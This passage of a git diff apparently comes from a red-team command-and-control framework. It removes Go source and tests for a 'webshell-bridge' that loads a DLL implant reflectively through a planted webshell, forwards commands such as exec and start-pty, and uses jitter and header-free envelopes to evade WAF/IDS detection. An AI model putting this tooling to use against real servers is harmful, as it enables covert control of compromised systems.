(listenerrpc.ListenerRPC_SpiteStreamClient, error) { - if f.spiteStream == nil { - return nil, errors.New("missing spite stream") - } - return f.spiteStream, nil -} - -func (f *fakeBridgeRPC) StopPipeline(ctx context.Context, in *clientpb.CtrlPipeline, opts ...grpc.CallOption) (*clientpb.Empty, error) { - f.mu.Lock() - defer f.mu.Unlock() - f.stopCalls = append(f.stopCalls, proto.Clone(in).(*clientpb.CtrlPipeline)) - return &clientpb.Empty{}, nil -} - -func (f *fakeBridgeRPC) StopCalls() []*clientpb.CtrlPipeline { - f.mu.Lock() - defer f.mu.Unlock() - out := make([]*clientpb.CtrlPipeline, len(f.stopCalls)) - copy(out, f.stopCalls) - return out -} - -type fakeSpiteStream struct { - grpc.ClientStream - - closeOnce sync.Once - closed chan struct{} -} - -func newFakeSpiteStream() *fakeSpiteStream { - return &fakeSpiteStream{ - closed: make(chan struct{}), - } -} - -func (f *fakeSpiteStream) Header() (metadata.MD, error) { return nil, nil } -func (f *fakeSpiteStream) Trailer() metadata.MD { return nil } -func (f *fakeSpiteStream) CloseSend() error { - f.closeOnce.Do(func() { close(f.closed) }) - return nil -} -func (f *fakeSpiteStream) Context() context.Context { return context.Background() } -func (f *fakeSpiteStream) SendMsg(m interface{}) error { return nil } -func (f *fakeSpiteStream) RecvMsg(m interface{}) error { <-f.closed; return io.EOF } -func (f *fakeSpiteStream) Send(*clientpb.SpiteResponse) error { return nil } -func (f *fakeSpiteStream) Recv() (*clientpb.SpiteRequest, error) { - <-f.closed - return nil, io.EOF -} - -// collectingSpiteStream records all sent SpiteResponses for test assertions. -type collectingSpiteStream struct { - grpc.ClientStream - - mu sync.Mutex - sent []*clientpb.SpiteResponse - closed chan struct{} - recvOnce sync.Once -} - -func newCollectingSpiteStream() *collectingSpiteStream { - return &collectingSpiteStream{closed: make(chan struct{})} -} - -func (s *collectingSpiteStream) Header() (metadata.MD, error) { return nil, nil } -func (s *collectingSpiteStream) Trailer() metadata.MD { return nil } -func (s *collectingSpiteStream) CloseSend() error { - s.recvOnce.Do(func() { close(s.closed) }) - return nil -} -func (s *collectingSpiteStream) Context() context.Context { return context.Background() } -func (s *collectingSpiteStream) SendMsg(m interface{}) error { return nil } -func (s *collectingSpiteStream) RecvMsg(m interface{}) error { <-s.closed; return io.EOF } -func (s *collectingSpiteStream) Send(resp *clientpb.SpiteResponse) error { - s.mu.Lock() - s.sent = append(s.sent, proto.Clone(resp).(*clientpb.SpiteResponse)) - s.mu.Unlock() - return nil -} -func (s *collectingSpiteStream) Recv() (*clientpb.SpiteRequest, error) { - <-s.closed - return nil, io.EOF -} -func (s *collectingSpiteStream) Sent() []*clientpb.SpiteResponse { - s.mu.Lock() - defer s.mu.Unlock() - out := make([]*clientpb.SpiteResponse, len(s.sent)) - copy(out, s.sent) - return out -} - -func TestForwardToSessionUnary(t *testing.T) { - srv, _ := startMockWebshell(t) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) - } - ch.StartRecvLoop() - - session := &Session{ - ID: "test-session", - PipelineID: "test-pipeline", - ListenerID: "test-listener", - channel: ch, - } - - stream := newCollectingSpiteStream() - runtimeCtx, runtimeCancel := context.WithCancel(context.Background()) - defer runtimeCancel() - - runtime := &pipelineRuntime{ - name: "test-pipeline", - ctx: runtimeCtx, - cancel: runtimeCancel, - spiteStream: stream, - done: make(chan struct{}), - } - runtime.sessions.Store(session.ID, session) - - bridge := &Bridge{cfg: &Config{ListenerName: "test-listener"}} - - req := &clientpb.SpiteRequest{ - Session: &clientpb.Session{SessionId: session.ID}, - Task: &clientpb.Task{TaskId: 1, Total: 1}, - Spite: &implantpb.Spite{Name: "exec"}, - } - - bridge.forwardToSession(runtime, session.ID, 1, req) - - sent := stream.Sent() - if len(sent) != 1 { - t.Fatalf("expected 1 response, got %d", len(sent)) - } - if sent[0].GetSpite().GetName() != "resp:exec" { - t.Errorf("expected 'resp:exec', got %q", sent[0].GetSpite().GetName()) - } -} - -func TestForwardToSessionStreaming(t *testing.T) { - srv, mock := startMockWebshell(t) - - var callCount int - var mu sync.Mutex - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte("LOADED"), 200 - } - if stage == "init" { - regData, _ := proto.Marshal(mock.register) - sid := make([]byte, 4) - sid[0] = byte(mock.sessionID) - return append(sid, regData...), 200 - } - if stage == "spite" { - // Parse input - inSpites := &implantpb.Spites{} - if len(body) > 0 { - proto.Unmarshal(body, inSpites) - } - - mu.Lock() - callCount++ - n := callCount - mu.Unlock() - - // First few calls: return streaming responses for task 500 - if n <= 3 { - resp := &implantpb.Spites{ - Spites: []*implantpb.Spite{{ - Name: fmt.Sprintf("stream-resp-%d", n-1), - TaskId: 500, - }}, - } - data, _ := proto.Marshal(resp) - return data, 200 - } - empty, _ := proto.Marshal(&implantpb.Spites{}) - return empty, 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) - } - ch.StartRecvLoop() - - session := &Session{ - ID: "test-session", - PipelineID: "test-pipeline", - ListenerID: "test-listener", - channel: ch, - } - - stream := newCollectingSpiteStream() - runtimeCtx, runtimeCancel := context.WithCancel(context.Background()) - defer runtimeCancel() - - runtime := &pipelineRuntime{ - name: "test-pipeline", - ctx: runtimeCtx, - cancel: runtimeCancel, - spiteStream: stream, - done: make(chan struct{}), - } - runtime.sessions.Store(session.ID, session) - - bridge := &Bridge{cfg: &Config{ListenerName: "test-listener"}} - - req := &clientpb.SpiteRequest{ - Session: &clientpb.Session{SessionId: session.ID}, - Task: &clientpb.Task{TaskId: 500, Total: -1}, - Spite: &implantpb.Spite{Name: "start-pty"}, - } - - bridge.forwardToSession(runtime, session.ID, 500, req) - - // Wait for streaming responses - deadline := time.Now().Add(5 * time.Second) - for time.Now().Before(deadline) { - sent := stream.Sent() - if len(sent) >= 2 { - break - } - time.Sleep(100 * time.Millisecond) - } - - sent := stream.Sent() - if len(sent) < 2 { - t.Fatalf("expected at least 2 streaming responses, got %d", len(sent)) - } -} - -var _ listenerrpc.ListenerRPC_SpiteStreamClient = (*fakeSpiteStream)(nil) -var _ listenerrpc.ListenerRPC_SpiteStreamClient = (*collectingSpiteStream)(nil) -var _ listenerrpc.ListenerRPCClient = (*fakeBridgeRPC)(nil) diff --git a/server/cmd/webshell-bridge/channel.go b/server/cmd/webshell-bridge/channel.go deleted file mode 100644 index 4bf4172d..00000000 --- a/server/cmd/webshell-bridge/channel.go +++ /dev/null @@ -1,561 +0,0 @@ -package main - -import ( - "bytes" - "context" - "crypto/hmac" - "crypto/sha256" - "crypto/tls" - "encoding/binary" - "encoding/hex" - "encoding/json" - "fmt" - "io" - "math/rand" - "net/http" - "strings" - "sync" - "sync/atomic" - "time" - - "github.com/chainreactors/IoM-go/proto/client/clientpb" - "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "github.com/chainreactors/logs" - "google.golang.org/protobuf/proto" -) - -const ( - httpTimeout = 30 * time.Second - longPollTimeout = 10 * time.Second - pollIdleInterval = 5 * time.Second - pollActiveInterval = 200 * time.Millisecond - jitterFactor = 0.3 - streamChanBuffer = 16 - streamReconnectDelay = 2 * time.Second - streamMaxReconnect = 5 - streamFrameMaxSize = 10 * 1024 * 1024 // 10MB sanity limit -) - -// Stage codes encoded in body envelope (no HTTP headers). -const ( - stageLoad byte = 0x01 - stageStatus byte = 0x02 - stageInit byte = 0x03 - stageSpite byte = 0x04 - stageStream byte = 0x05 - stageDeps byte = 0x06 -) - -// ChannelIface abstracts the communication channel to the bridge DLL. -type ChannelIface interface { - Connect(ctx context.Context) error - Handshake() (*implantpb.Register, error) - StartRecvLoop() - Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) - OpenStream(taskID uint32) <-chan *implantpb.Spite - SendSpite(taskID uint32, spite *implantpb.Spite) error - CloseStream(taskID uint32) - CloseAllStreams() - WithSecure(keyPair *clientpb.KeyPair) - Close() error - SessionID() uint32 - IsClosed() bool -} - -// Channel communicates with the bridge DLL through HTTP POST requests. -// All control information (stage, token, session ID) is encoded in a body -// envelope prefix — no custom HTTP headers, reducing WAF/IDS fingerprint. -// -// Body envelope format: -// -// [1B stage][4B sessionID LE][1B token_len][token bytes][payload...] -// -// Payload is stage-specific: -// - load: raw DLL bytes -// - status: empty -// - init: empty -// - spite: Spites protobuf -// - stream: empty -// - deps: [1B dep_name_len][dep_name][jar bytes] -type Channel struct { - webshellURL string - token string - client *http.Client - streamClient *http.Client // no timeout, for long-lived stream connection - - sid uint32 - sidSet atomic.Bool - closed atomic.Bool - closeCh chan struct{} - - lastStatus *StatusResponse // populated by Connect() - streamSupported atomic.Bool - - pendMu sync.Mutex - pending map[uint32]chan *implantpb.Spite - - recvCancel context.CancelFunc -} - -// NewChannel creates a channel that communicates with the DLL through -// the webshell's body-envelope HTTP endpoint. -func NewChannel(webshellURL, token string) *Channel { - return &Channel{ - webshellURL: webshellURL, - token: token, - client: &http.Client{ - Timeout: longPollTimeout + 5*time.Second, - Transport: &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - }, - }, - streamClient: &http.Client{ - Timeout: 0, - Transport: &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - }, - }, - pending: make(map[uint32]chan *implantpb.Spite), - closeCh: make(chan struct{}), - } -} - -// StatusResponse is the structured status returned by the webshell. -type StatusResponse struct { - Ready bool `json:"ready"` - Method string `json:"method"` - DepsPresent bool `json:"deps_present"` - BridgeVersion string `json:"bridge_version"` -} - -// buildEnvelope constructs the body prefix: [1B stage][4B sid LE][1B token_len][token]. -func (c *Channel) buildEnvelope(stage byte, payload []byte) []byte { - tok := computeToken(c.token) - tokLen := len(tok) - if tokLen > 255 { - tokLen = 255 - tok = tok[:255] - } - - // envelope header: 1 + 4 + 1 + tokLen - hdrLen := 6 + tokLen - buf := make([]byte, hdrLen+len(payload)) - buf[0] = stage - binary.LittleEndian.PutUint32(buf[1:5], c.sid) - buf[5] = byte(tokLen) - copy(buf[6:6+tokLen], tok) - copy(buf[hdrLen:], payload) - return buf -} - -// Connect verifies the webshell is reachable and the DLL is loaded. -func (c *Channel) Connect(ctx context.Context) error { - body, err := c.doRequest(ctx, stageStatus, nil) - if err != nil { - return fmt.Errorf("connect: %w", err) - } - text := strings.TrimSpace(string(body)) - - if len(text) > 0 && text[0] == '{' { - var sr StatusResponse - if jsonErr := json.Unmarshal([]byte(text), &sr); jsonErr == nil { - c.lastStatus = &sr - if !sr.Ready { - return fmt.Errorf("DLL not loaded (status: %s)", text) - } - return nil - } - } - - if text != "LOADED" { - return fmt.Errorf("DLL not loaded (status: %s)", text) - } - return nil -} - -// LoadDLL sends the bridge DLL to the webshell for reflective loading. -func (c *Channel) LoadDLL(ctx context.Context, dllBytes []byte) error { - _, err := c.doRequest(ctx, stageLoad, dllBytes) - if err != nil { - return fmt.Errorf("load DLL: %w", err) - } - return nil -} - -// DeliverDep sends a dependency file (e.g., jna.jar) to the webshell. -// Payload format for deps stage: [1B dep_name_len][dep_name][jar bytes]. -func (c *Channel) DeliverDep(ctx context.Context, depName string, data []byte) error { - nameBytes := []byte(depName) - if len(nameBytes) > 255 { - nameBytes = nameBytes[:255] - } - payload := make([]byte, 1+len(nameBytes)+len(data)) - payload[0] = byte(len(nameBytes)) - copy(payload[1:1+len(nameBytes)], nameBytes) - copy(payload[1+len(nameBytes):], data) - - respBody, err := c.doRequest(ctx, stageDeps, payload) - if err != nil { - return fmt.Errorf("deliver dep %s: %w", depName, err) - } - logs.Log.Debugf("dep delivered: %s -> %s", depName, strings.TrimSpace(string(respBody))) - return nil -} - -// Handshake calls bridge_init on the DLL via the webshell and returns -// the Register message containing SysInfo and module list. -func (c *Channel) Handshake() (*implantpb.Register, error) { - body, err := c.doRequest(context.Background(), stageInit, nil) - if err != nil { - return nil, fmt.Errorf("handshake: %w", err) - } - if len(body) < 4 { - return nil, fmt.Errorf("handshake response too short: %d bytes", len(body)) - } - - c.sid = binary.LittleEndian.Uint32(body[:4]) - c.sidSet.Store(true) - - reg := &implantpb.Register{} - if err := proto.Unmarshal(body[4:], reg); err != nil { - return nil, fmt.Errorf("unmarshal register: %w", err) - } - - logs.Log.Debugf("handshake: sid=%d name=%s modules=%v", c.sid, reg.Name, reg.Module) - return reg, nil -} - -// StartRecvLoop starts the background receive loop. It tries StreamHTTP first -// (long-lived HTTP response stream) and falls back to polling if unsupported. -func (c *Channel) StartRecvLoop() { - ctx, cancel := context.WithCancel(context.Background()) - c.recvCancel = cancel - go c.recvLoop(ctx) -} - -func (c *Channel) recvLoop(ctx context.Context) { - if c.tryStreamLoop(ctx) { - for attempt := 1; attempt <= streamMaxReconnect; attempt++ { - select { - case <-ctx.Done(): - return - case <-c.closeCh: - return - case <-time.After(jitter(streamReconnectDelay)): - } - if c.tryStreamLoop(ctx) { - attempt = 0 - } - } - logs.Log.Warn("stream reconnect exhausted, falling back to poll mode") - } - logs.Log.Debug("using poll mode for streaming tasks") - c.pollLoop(ctx) -} - -// tryStreamLoop opens a long-lived POST with stage=stream envelope and reads -// length-prefixed frames from the response body. -func (c *Channel) tryStreamLoop(ctx context.Context) bool { - envelope := c.buildEnvelope(stageStream, nil) - req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bytes.NewReader(envelope)) - if err != nil { - logs.Log.Debugf("stream: request create error: %v", err) - return false - } - req.Header.Set("Content-Type", "application/octet-stream") - - resp, err := c.streamClient.Do(req) - if err != nil { - logs.Log.Debugf("stream: connection error: %v", err) - return false - } - defer resp.Body.Close() - - if resp.StatusCode != http.StatusOK { - logs.Log.Debugf("stream: HTTP %d, not supported", resp.StatusCode) - return false - } - - c.streamSupported.Store(true) - logs.Log.Important("stream mode active") - - if err := c.readStreamFrames(ctx, resp.Body); err != nil { - if ctx.Err() != nil { - return true - } - logs.Log.Debugf("stream: read error: %v", err) - } - return true -} - -func (c *Channel) readStreamFrames(ctx context.Context, r io.Reader) error { - for { - select { - case <-ctx.Done(): - return ctx.Err() - case <-c.closeCh: - return nil - default: - } - - data, err := readFrame(r) - if err != nil { - return err - } - if len(data) > 0 { - c.dispatchResponse(data) - } - } -} - -func readFrame(r io.Reader) ([]byte, error) { - var lenBuf [4]byte - if _, err := io.ReadFull(r, lenBuf[:]); err != nil { - return nil, err - } - frameLen := binary.BigEndian.Uint32(lenBuf[:]) - if frameLen == 0 { - return nil, nil - } - if frameLen > streamFrameMaxSize { - return nil, fmt.Errorf("frame too large: %d bytes", frameLen) - } - payload := make([]byte, frameLen) - if _, err := io.ReadFull(r, payload); err != nil { - return nil, err - } - return payload, nil -} - -func (c *Channel) pollLoop(ctx context.Context) { - for { - c.pendMu.Lock() - hasPending := len(c.pending) > 0 - c.pendMu.Unlock() - - if !hasPending { - select { - case <-ctx.Done(): - return - case <-c.closeCh: - return - case <-time.After(jitter(pollIdleInterval)): - } - continue - } - - empty := &implantpb.Spites{} - data, err := proto.Marshal(empty) - if err != nil { - continue - } - respBody, err := c.doRequest(ctx, stageSpite, data) - if err != nil { - if ctx.Err() != nil { - return - } - logs.Log.Debugf("poll error: %v", err) - select { - case <-ctx.Done(): - return - case <-c.closeCh: - return - case <-time.After(jitter(pollActiveInterval)): - } - continue - } - - hasData := c.dispatchResponse(respBody) - - var interval time.Duration - if hasData { - interval = pollActiveInterval - } else { - interval = pollIdleInterval - } - select { - case <-ctx.Done(): - return - case <-c.closeCh: - return - case <-time.After(jitter(interval)): - } - } -} - -// Forward sends a Spite and waits for a single response (unary request-response). -func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) { - if c.closed.Load() { - return nil, fmt.Errorf("channel closed") - } - - spite.TaskId = taskID - spites := &implantpb.Spites{Spites: []*implantpb.Spite{spite}} - data, err := proto.Marshal(spites) - if err != nil { - return nil, fmt.Errorf("marshal spite: %w", err) - } - - respBody, err := c.doRequest(context.Background(), stageSpite, data) - if err != nil { - return nil, fmt.Errorf("forward: %w", err) - } - - respSpites := &implantpb.Spites{} - if err := proto.Unmarshal(respBody, respSpites); err != nil { - return nil, fmt.Errorf("unmarshal response: %w", err) - } - - for _, s := range respSpites.GetSpites() { - if s.GetTaskId() == taskID { - return s, nil - } - } - - if len(respSpites.GetSpites()) > 0 { - for _, s := range respSpites.GetSpites() { - c.dispatchSpite(s) - } - } - - return nil, fmt.Errorf("no response for task %d", taskID) -} - -func (c *Channel) OpenStream(taskID uint32) <-chan *implantpb.Spite { - ch := make(chan *implantpb.Spite, streamChanBuffer) - c.pendMu.Lock() - c.pending[taskID] = ch - c.pendMu.Unlock() - return ch -} - -func (c *Channel) SendSpite(taskID uint32, spite *implantpb.Spite) error { - if c.closed.Load() { - return fmt.Errorf("channel closed") - } - - spite.TaskId = taskID - spites := &implantpb.Spites{Spites: []*implantpb.Spite{spite}} - data, err := proto.Marshal(spites) - if err != nil { - return fmt.Errorf("marshal: %w", err) - } - - respBody, err := c.doRequest(context.Background(), stageSpite, data) - if err != nil { - return err - } - - _ = c.dispatchResponse(respBody) - return nil -} - -func (c *Channel) CloseStream(taskID uint32) { - c.pendMu.Lock() - delete(c.pending, taskID) - c.pendMu.Unlock() -} - -func (c *Channel) CloseAllStreams() { - c.pendMu.Lock() - for id, ch := range c.pending { - close(ch) - delete(c.pending, id) - } - c.pendMu.Unlock() -} - -func (c *Channel) SessionID() uint32 { return c.sid } - -func (c *Channel) IsClosed() bool { return c.closed.Load() } - -func (c *Channel) WithSecure(_ *clientpb.KeyPair) {} - -func (c *Channel) Close() error { - if c.closed.Swap(true) { - return nil - } - close(c.closeCh) - if c.recvCancel != nil { - c.recvCancel() - } - c.CloseAllStreams() - return nil -} - -// doRequest sends a POST with body envelope, no custom headers. -func (c *Channel) doRequest(ctx context.Context, stage byte, payload []byte) ([]byte, error) { - envelope := c.buildEnvelope(stage, payload) - - req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bytes.NewReader(envelope)) - if err != nil { - return nil, err - } - req.Header.Set("Content-Type", "application/octet-stream") - - resp, err := c.client.Do(req) - if err != nil { - return nil, err - } - defer resp.Body.Close() - - if resp.StatusCode != http.StatusOK { - respBody, _ := io.ReadAll(resp.Body) - return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(respBody)) - } - - return io.ReadAll(resp.Body) -} - -func (c *Channel) dispatchResponse(body []byte) bool { - if len(body) == 0 { - return false - } - spites := &implantpb.Spites{} - if err := proto.Unmarshal(body, spites); err != nil { - logs.Log.Debugf("dispatch unmarshal error: %v", err) - return false - } - dispatched := false - for _, spite := range spites.GetSpites() { - c.dispatchSpite(spite) - dispatched = true - } - return dispatched -} - -func (c *Channel) dispatchSpite(spite *implantpb.Spite) { - taskID := spite.GetTaskId() - c.pendMu.Lock() - ch, ok := c.pending[taskID] - c.pendMu.Unlock() - if ok { - select { - case ch <- spite: - default: - logs.Log.Debugf("channel: pending full for task %d", taskID) - } - } -} - -// jitter adds ±jitterFactor random variation to an interval. -func jitter(d time.Duration) time.Duration { - delta := float64(d) * jitterFactor - return d + time.Duration(delta*(2*rand.Float64()-1)) -} - -// computeToken returns the token value for the body envelope. -// Short secrets (≤32 chars) are sent as-is. -// Longer secrets use time-based HMAC-SHA256 that rotates every 30 seconds. -func computeToken(secret string) string { - if secret == "" { - return "" - } - if len(secret) <= 32 { - return secret - } - window := time.Now().Unix() / 30 - mac := hmac.New(sha256.New, []byte(secret)) - _ = binary.Write(mac, binary.BigEndian, window) - return hex.EncodeToString(mac.Sum(nil)) -} diff --git a/server/cmd/webshell-bridge/channel_test.go b/server/cmd/webshell-bridge/channel_test.go deleted file mode 100644 index 71df0cb0..00000000 --- a/server/cmd/webshell-bridge/channel_test.go +++ /dev/null @@ -1,723 +0,0 @@ -package main - -import ( - "bytes" - "crypto/hmac" - "crypto/sha256" - "encoding/binary" - "encoding/hex" - "fmt" - "io" - "net/http" - "net/http/httptest" - "sync" - "testing" - "time" - - "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "google.golang.org/protobuf/proto" -) - -// mockWebshell simulates the webshell's X-Stage endpoints for testing. -type mockWebshell struct { - register *implantpb.Register - sessionID uint32 - - mu sync.Mutex - handler func(stage string, body []byte) ([]byte, int) // custom handler - - streamMu sync.Mutex - streamFrames [][]byte // length-prefixed frames to send for X-Stage: stream - streamDelay time.Duration -} - -func newMockWebshell() *mockWebshell { - return &mockWebshell{ - sessionID: 42, - register: &implantpb.Register{ - Name: "test-dll", - Module: []string{"exec", "upload", "download"}, - Sysinfo: &implantpb.SysInfo{ - Os: &implantpb.Os{ - Name: "Windows", - }, - }, - }, - } -} - -func (m *mockWebshell) ServeHTTP(w http.ResponseWriter, r *http.Request) { - stage := r.Header.Get("X-Stage") - body, _ := io.ReadAll(r.Body) - - m.mu.Lock() - handler := m.handler - m.mu.Unlock() - - if handler != nil { - respBody, status := handler(stage, body) - if status != 0 { - w.WriteHeader(status) - } - if respBody != nil { - w.Write(respBody) - } - return - } - - switch stage { - case "status": - w.Write([]byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`)) - case "init": - regData, _ := proto.Marshal(m.register) - sid := make([]byte, 4) - binary.LittleEndian.PutUint32(sid, m.sessionID) - w.Write(sid) - w.Write(regData) - case "spite": - // Echo: parse input Spites, modify Name, return - inSpites := &implantpb.Spites{} - if len(body) > 0 { - proto.Unmarshal(body, inSpites) - } - outSpites := &implantpb.Spites{} - for _, s := range inSpites.GetSpites() { - outSpites.Spites = append(outSpites.Spites, &implantpb.Spite{ - Name: "resp:" + s.Name, - TaskId: s.TaskId, - }) - } - data, _ := proto.Marshal(outSpites) - w.Write(data) - case "stream": - m.handleStream(w) - default: - w.WriteHeader(404) - } -} - -func (m *mockWebshell) setHandler(h func(string, []byte) ([]byte, int)) { - m.mu.Lock() - m.handler = h - m.mu.Unlock() -} - -// setStreamFrames configures length-prefixed frames returned by X-Stage: stream. -func (m *mockWebshell) setStreamFrames(frames [][]byte, delay time.Duration) { - m.streamMu.Lock() - m.streamFrames = frames - m.streamDelay = delay - m.streamMu.Unlock() -} - -// handleStream writes pre-configured length-prefixed frames to the response. -func (m *mockWebshell) handleStream(w http.ResponseWriter) { - m.streamMu.Lock() - frames := m.streamFrames - delay := m.streamDelay - m.streamMu.Unlock() - - if frames == nil { - w.WriteHeader(http.StatusNotFound) - return - } - - flusher, _ := w.(http.Flusher) - for _, frame := range frames { - lenBuf := make([]byte, 4) - binary.BigEndian.PutUint32(lenBuf, uint32(len(frame))) - w.Write(lenBuf) - w.Write(frame) - if flusher != nil { - flusher.Flush() - } - if delay > 0 { - time.Sleep(delay) - } - } -} - -func startMockWebshell(t *testing.T) (*httptest.Server, *mockWebshell) { - t.Helper() - mock := newMockWebshell() - srv := httptest.NewServer(mock) - t.Cleanup(srv.Close) - return srv, mock -} - -func TestChannelConnect(t *testing.T) { - srv, _ := startMockWebshell(t) - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if err := ch.Connect(t.Context()); err != nil { - t.Fatalf("connect: %v", err) - } - // Verify structured status was parsed - if ch.lastStatus == nil { - t.Fatal("expected lastStatus to be populated") - } - if ch.lastStatus.Method != "jni" { - t.Errorf("expected method 'jni', got %q", ch.lastStatus.Method) - } - if ch.lastStatus.BridgeVersion != "1.0" { - t.Errorf("expected bridge_version '1.0', got %q", ch.lastStatus.BridgeVersion) - } -} - -func TestChannelConnectLegacy(t *testing.T) { - srv, mock := startMockWebshell(t) - // Simulate old webshell returning plain "LOADED" - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte("LOADED"), 200 - } - return nil, 404 - }) - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if err := ch.Connect(t.Context()); err != nil { - t.Fatalf("legacy connect: %v", err) - } - // lastStatus should be nil for legacy responses - if ch.lastStatus != nil { - t.Error("expected nil lastStatus for legacy response") - } -} - -func TestChannelConnectNotLoaded(t *testing.T) { - srv, mock := startMockWebshell(t) - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte(`{"ready":false,"method":"none","deps_present":false,"bridge_version":"1.0"}`), 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - err := ch.Connect(t.Context()) - if err == nil { - t.Fatal("expected error for not-ready status") - } -} - -func TestChannelConnectNotLoadedLegacy(t *testing.T) { - srv, mock := startMockWebshell(t) - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte("NOT_LOADED"), 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - err := ch.Connect(t.Context()) - if err == nil { - t.Fatal("expected error for NOT_LOADED") - } -} - -func TestChannelHandshake(t *testing.T) { - srv, _ := startMockWebshell(t) - ch := NewChannel(srv.URL, "") - defer ch.Close() - - reg, err := ch.Handshake() - if err != nil { - t.Fatalf("handshake: %v", err) - } - - if reg.Name != "test-dll" { - t.Errorf("expected name 'test-dll', got %q", reg.Name) - } - if len(reg.Module) != 3 { - t.Errorf("expected 3 modules, got %d", len(reg.Module)) - } - if reg.Sysinfo == nil || reg.Sysinfo.Os == nil || reg.Sysinfo.Os.Name != "Windows" { - t.Errorf("expected Windows sysinfo, got %+v", reg.Sysinfo) - } - if ch.SessionID() != 42 { - t.Errorf("expected sessionID 42, got %d", ch.SessionID()) - } -} - -func TestChannelForward(t *testing.T) { - srv, _ := startMockWebshell(t) - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) - } - - resp, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) - if err != nil { - t.Fatalf("forward: %v", err) - } - if resp.Name != "resp:exec" { - t.Errorf("expected 'resp:exec', got %q", resp.Name) - } -} - -func TestChannelForwardMultiple(t *testing.T) { - srv, _ := startMockWebshell(t) - ch := NewChannel(srv.URL, "") - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) - } - - for i, name := range []string{"exec", "upload", "download"} { - resp, err := ch.Forward(uint32(i+1), &implantpb.Spite{Name: name}) - if err != nil { - t.Fatalf("forward %d: %v", i, err) - } - expected := "resp:" + name - if resp.Name != expected { - t.Errorf("task %d: expected %q, got %q", i+1, expected, resp.Name) - } - } -} - -func TestChannelCloseIdempotent(t *testing.T) { - ch := NewChannel("http://localhost:1", "") - if err := ch.Close(); err != nil { - t.Fatalf("first close: %v", err) - } - if err := ch.Close(); err != nil { - t.Fatalf("second close: %v", err) - } -} - -func TestChannelForwardAfterClose(t *testing.T) { - ch := NewChannel("http://localhost:1", "") - ch.Close() - - _, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) - if err == nil { - t.Fatal("expected error forwarding on closed channel") - } -} - -func TestChannelStreamDispatch(t *testing.T) { - srv, mock := startMockWebshell(t) - - var callCount int - var mu sync.Mutex - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "status" { - return []byte(`{"ready":true,"method":"jni","deps_present":false,"bridge_version":"1.0"}`), 200 - } - if stage == "init" { - regData, _ := proto.Marshal(mock.register) - sid := make([]byte, 4) - binary.LittleEndian.PutUint32(sid, mock.sessionID) - return append(sid, regData...), 200 - } - if stage == "spite" { - mu.Lock() - callCount++ - n := callCount - mu.Unlock() - - // First call: return a streaming response - if n <= 3 { - resp := &implantpb.Spites{ - Spites: []*implantpb.Spite{{ - Name: "stream-chunk", - TaskId: 100, - }}, - } - data, _ := proto.Marshal(resp) - return data, 200 - } - // After that: empty - empty, _ := proto.Marshal(&implantpb.Spites{}) - return empty, 200 - } - return nil, 404 - }) - - ch := NewChannel(srv.URL, "") - defer ch.Close() - - respCh := ch.OpenStream(100) - ch.StartRecvLoop() - - // Wait for poll to deliver a response - select { - case spite := <-respCh: - if spite.Name != "stream-chunk" { - t.Errorf("expected 'stream-chunk', got %q", spite.Name) - } - case <-time.After(3 * time.Second): - t.Fatal("timeout waiting for streamed response") - } - - ch.CloseStream(100) -} - -func TestComputeHMAC(t *testing.T) { - secret := "test-secret-token-longer-than-32chars" - token := computeToken(secret) - - // Token should be a 64-char hex string (SHA-256) - if len(token) != 64 { - t.Fatalf("expected 64 hex chars, got %d", len(token)) - } - if _, err := hex.DecodeString(token); err != nil { - t.Fatalf("token is not valid hex: %v", err) - } - - // Same call within the same 30s window should produce the same token - token2 := computeToken(secret) - if token != token2 { - t.Error("same-window HMAC should be identical") - } - - // Different secret should produce different token - token3 := computeToken("different-secret-also-longer-than32") - if token == token3 { - t.Error("different secrets should produce different tokens") - } -} - -func TestHMACWindowTolerance(t *testing.T) { - secret := "test-secret-token-longer-than-32chars" - now := time.Now().Unix() / 30 - - // Verify that the token matches one of the valid windows (current ±1) - token := computeToken(secret) - - matched := false - for w := now - 1; w <= now+1; w++ { - mac := hmac.New(sha256.New, []byte(secret)) - _ = binary.Write(mac, binary.BigEndian, w) - expected := hex.EncodeToString(mac.Sum(nil)) - if expected == token { - matched = true - break - } - } - if !matched { - t.Error("HMAC token did not match any valid time window") - } -} - -func TestChannelDeliverDep(t *testing.T) { - var receivedName string - var receivedLen int - srv, mock := startMockWebshell(t) - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - if stage == "deps" { - receivedLen = len(body) - return []byte("OK:/dev/shm/.jna.jar"), 200 - } - return nil, 404 - }) - // Also capture the X-Dep-Name header - origHandler := mock.handler - mock.setHandler(func(stage string, body []byte) ([]byte, int) { - return origHandler(stage, body) - }) - - ch := NewChannel(srv.URL, "test-token") - defer ch.Close() - - fakeJar := []byte("PK\x03\x04fake-jar-content") - err := 